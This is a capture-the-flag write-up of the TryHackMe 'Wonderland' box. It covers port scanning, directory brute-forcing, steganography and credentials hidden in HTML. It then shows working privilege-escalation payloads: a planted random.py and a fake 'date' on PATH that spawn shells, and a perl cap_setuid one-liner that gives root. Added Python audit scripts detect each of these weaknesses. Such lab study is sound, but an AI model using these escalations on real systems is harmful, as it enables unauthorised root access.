Wonderland
These notes are from a challenge I did @tryhackme called wonderland.
First Checks
Let's scan for open ports first: `nmap -sC -sV 10.10.28.31`
Nmap output
```txt
Nmap scan report for 10.10.28.31
Host is up (0.075s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds
```
Let's search for paths on the webpage on port 80: `gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.28.31:80`
Gobuster output
```txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.28.31:80
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/10/21 16:46:38 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 0] [--> img/]
/r                    (Status: 301) [Size: 0] [--> r/]
/poem                 (Status: 301) [Size: 0] [--> poem/]
```
Steganography
Looking at http://10.10.28.31/img/ we see the following files:
- alice_door.jpg
- alice_door.png
- white_rabbit_1.jpg
Let's download them all:
```sh
wget http://10.10.28.31/img/alice_door.jpg
wget http://10.10.28.31/img/alice_door.png
wget http://10.10.28.31/img/white_rabbit_1.jpg
```
and run steghide on them. Unfortunately `alice_door.jpg` and `alice_door.png` don't show any result (at least not without a passphrase...), but `white_rabbit_1.jpg` seems promising:
```txt
steghide extract -sf white_rabbit_1.jpg -p ''
the file "hint.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "hint.txt".
cat hint.txt
follow the r a b b i t
```
The hint means to follow this path: http://10.10.28.31/r/a/b/b/i/t/
Viewing the HTML code we see:
```html
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
```
Login as alice
Let's try to log in using those credentials: `ssh alice@10.10.28.31`
ssh login
```txt
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Oct 21 19:14:20 UTC 2021

  System load:  0.0                Processes:           85
  Usage of /:   18.9% of 19.56GB   Users logged in:     0
  Memory usage: 31%                IP address for eth0: 10.10.28.31
  Swap usage:   0%

0 packages can be updated.
0 updates are security updates.

Last login: Mon May 25 16:37:21 2020 from 192.168.170.1
```
It is strange to see root.txt in the folder of alice. `find ./ -type f -iname "user.txt"` doesn't reveal anything. The hint "Everything is upside down here." means that if root.txt is here, maybe user.txt is under /root. We can directly read user.txt by running `cat /root/user.txt`. lol...
Escalate privileges to rabbit
We see that `walrus_and_the_carpenter.py` imports and calls `random` to pick 10 random lines from the Alice in Wonderland poem stored in the file:

```python
import random
[...]
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
```
Running `sudo -l` shows we can run `walrus_and_the_carpenter.py` as rabbit:
ssh login
```txt
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```
To escalate privileges we can abuse the fact that we can run `walrus_and_the_carpenter.py` as rabbit: Python searches the script's own directory before the standard library, so a `random.py` we create in the same directory with the following content shadows the `random` module (and its `choice` function) imported and called by `walrus_and_the_carpenter.py`:

```python
import os

def choice(argument):
    os.system("/bin/bash")
```

Running `walrus_and_the_carpenter.py` with our `random.py` in place now gives us a prompt as rabbit:

```sh
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```
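As an added example (not part of the original writeup), here is a small Python audit for exactly this condition: it lists the standard-library modules a sudo-runnable script imports and reports those that a module file in the script's own directory would shadow. The `demo()` layout is constructed in a temporary directory and only mimics the Wonderland files.

```python
import ast
import importlib.util
import os
import sysconfig
import tempfile

def stdlib_module(name):
    """True if `name` resolves to the standard library on this interpreter."""
    spec = importlib.util.find_spec(name)
    return spec is not None and spec.origin is not None and (
        spec.origin in ("built-in", "frozen")
        or (spec.origin.startswith(sysconfig.get_paths()["stdlib"])
            and "site-packages" not in spec.origin))

def imported_names(script_path):
    """Top-level module names the script imports (`import x`, `from x import y`)."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def find_shadowed_imports(script_path):
    """Stdlib modules that a module file in the script's own directory shadows: that
    directory is sys.path[0], so <dir>/random.py beats the stdlib random for every user
    who runs the script, including one invoking it through sudo as another account."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    shadowed = []
    for name in sorted(imported_names(script_path)):
        as_file = os.path.join(script_dir, name + ".py")
        as_pkg = os.path.join(script_dir, name, "__init__.py")
        if stdlib_module(name) and (os.path.isfile(as_file) or os.path.isfile(as_pkg)):
            shadowed.append(name)
    return shadowed

def demo():
    """Constructed stand-in for the Wonderland layout (not the box's real files)."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "walrus_and_the_carpenter.py")
        with open(script, "w") as fh:
            fh.write("import random\nimport sys\nprint(random.choice(['a', 'b']))\n")
        before = find_shadowed_imports(script)   # nothing planted yet
        with open(os.path.join(d, "random.py"), "w") as fh:
            fh.write("# planted module\n")
        after = find_shadowed_imports(script)    # random.py now shadows the stdlib
    return before, after
```

The durable fix on the sudoers side is to keep any script run via sudo in a directory the invoking user cannot write to.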
Tea Party
As rabbit we see the following files in home:
```txt
drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
lrwxrwxrwx 1 root   root       9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty
```
Running teaParty we get the following:
```txt
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Thu, 21 Oct 2021 20:39:50 +0000
Ask very nicely, and I will give you some tea while you wait for him
```
Let's copy `teaParty` to the kali machine and view it in detail with `strings teaParty`:
Serving teaParty to my kali machine
```txt
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.9.193.173 - - [21/Oct/2021 19:59:25] "GET /teaParty HTTP/1.1" 200 -
```
Downloading teaParty file
```txt
wget 10.10.28.31:8000/teaParty
--2021-10-21 15:59:24--  http://10.10.28.31:8000/teaParty
Connecting to 10.10.28.31:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16816 (16K) [application/octet-stream]
Saving to: ‘teaParty’

teaParty            100%[========================================>]  16.42K  --.-KB/s    in 0.02s

2021-10-21 15:59:24 (895 KB/s) - ‘teaParty’ saved [16816/16816]
```
Run `strings teaParty`:

```txt
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
teaParty.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
getchar@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
```
We see the program calls `date` (through `system`, which resolves the bare name via PATH) in this line: `/bin/echo -n 'Probably by ' && date --date='next hour' -R`. Just like with `random` above, let's create our own `date` file, e.g.:

```sh
#!/bin/sh
bash
```
Now, let's make the file executable by everyone: `chmod +x date`, and prepend its directory to the PATH variable: `PATH=/home/rabbit:$PATH`
If we now execute `./teaParty` we get a shell as hatter:

```txt
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
```
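As an added example (not from the writeup), a Python check for the condition teaParty gets wrong: a privileged program that resolves commands through the caller's PATH. It walks a PATH value and reports every entry the caller could control; `demo()` builds a constructed PATH of the same shape as `PATH=/home/rabbit:$PATH` from temporary directories, with the current uid standing in for root so it runs unprivileged.

```python
import os
import stat
import tempfile

def untrusted_path_entries(path_value, trusted_owners=(0,)):
    """Return (entry, reason) for each PATH entry a privileged program must not search.
    teaParty looks `date` up through the caller's PATH, so any entry the caller can write
    to lets them substitute their own `date`; this flags every such entry."""
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append((entry, "current directory"))
        elif not entry.startswith("/"):
            findings.append((entry, "relative path"))
        elif not os.path.isdir(entry):
            findings.append((entry, "missing or not a directory, could be created later"))
        else:
            st = os.stat(entry)
            if st.st_uid not in trusted_owners:
                findings.append((entry, "owned by uid %d" % st.st_uid))
            elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                # The sticky bit does not help: anyone can still drop a new `date` file.
                findings.append((entry, "group/world writable"))
    return findings

def demo():
    """Constructed PATH in the shape the writeup builds (PATH=/home/rabbit:$PATH), using
    temporary directories as stand-ins for the box's real ones."""
    with tempfile.TemporaryDirectory() as home, tempfile.TemporaryDirectory() as sysdir:
        os.chmod(home, 0o777)    # over-permissive home directory: others can write to it
        os.chmod(sysdir, 0o755)  # like /usr/bin: only the owner can write
        path_value = "%s:%s:" % (home, sysdir)   # trailing ':' is an empty entry
        # the current uid counts as trusted here, so the demo works without root
        return untrusted_path_entries(path_value, trusted_owners=(0, os.getuid()))
```

A setuid program should not consult the inherited PATH at all: call helpers by absolute path, or reset PATH to a fixed system value before any `system()` or `exec*p()` call.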
We can see the hatter password in /home/hatter/password.txt
Login as hatter
Since we have the user name and password, let us log in with ssh: `ssh hatter@10.10.28.31`
`sudo -l`, `find / -perm -u=s -type f 2>/dev/null` and `find / -xdev -user hatter 2>/dev/null` don't reveal any interesting output, but `find / -xdev -group hatter 2>/dev/null` shows that group hatter owns perl. Unfortunately sudo is not possible and the suid bit isn't set on the perl executable.
There is another thing we can check: with `getcap -r / 2>/dev/null` we can check for "capabilities", and we see perl in the list:

```txt
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
```
Let's run a perl script misusing the capabilities, from GTFOBins: "If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID."

```sh
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```
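As an added example (not from the writeup), here is a Python parser for `getcap -r` output that flags credential-changing capabilities like the `cap_setuid+ep` on perl above, so an audit job can raise them before an attacker does. `SAMPLE_GETCAP` is constructed from the three lines above plus one line in the newer libcap output format; the set of dangerous capabilities is my choice, not something from the page.

```python
import re

# Capabilities that let a binary change or bypass its own credentials (perl's cap_setuid
# from the writeup is the classic case; mtr-packet's cap_net_raw is not in this set).
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_sys_admin", "cap_sys_ptrace"}
# One clause of libcap's text form: cap names, an operator (+ add, - drop, = set), flags e/i/p.
CLAUSE_RE = re.compile(r"^(cap_[a-z_]+(?:,cap_[a-z_]+)*)([+=-])([eip]*)$")

def parse_getcap_line(line):
    """One `getcap -r` line -> (path, {cap: set(flags)}), or None if it does not parse.
    Accepts "path = cap_x+ep" (libcap < 2.41) and "path cap_x=ep" (newer libcap);
    paths containing spaces are not handled."""
    path, _, rest = line.strip().partition(" ")
    rest = rest.strip()
    if rest.startswith("= "):
        rest = rest[2:]
    if not path or not rest:
        return None
    caps = {}
    for clause in rest.split():
        m = CLAUSE_RE.match(clause)
        if not m:
            return None
        names, op, flags = m.groups()
        for name in names.split(","):
            current = caps.setdefault(name, set())
            if op == "=":
                current.clear()
            (current.difference_update if op == "-" else current.update)(flags)
    return path, caps

def flag_dangerous(lines):
    """(path, cap, flags) for each dangerous capability in getcap output. Permitted-only
    caps are reported too: the program can raise them into its effective set itself."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        for name, flags in sorted(caps.items()):
            if name in DANGEROUS_CAPS and flags:
                findings.append((path, name, "".join(sorted(flags))))
    return findings

SAMPLE_GETCAP = [  # constructed: the writeup's three lines plus one in the newer format
    "/usr/bin/perl5.26.1 = cap_setuid+ep",
    "/usr/bin/mtr-packet = cap_net_raw+ep",
    "/usr/bin/perl = cap_setuid+ep",
    "/usr/bin/ping cap_net_raw=ep",
]
```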
We are now root and can read root.txt in the home folder of alice:

```sh
cat /home/alice/root.txt
```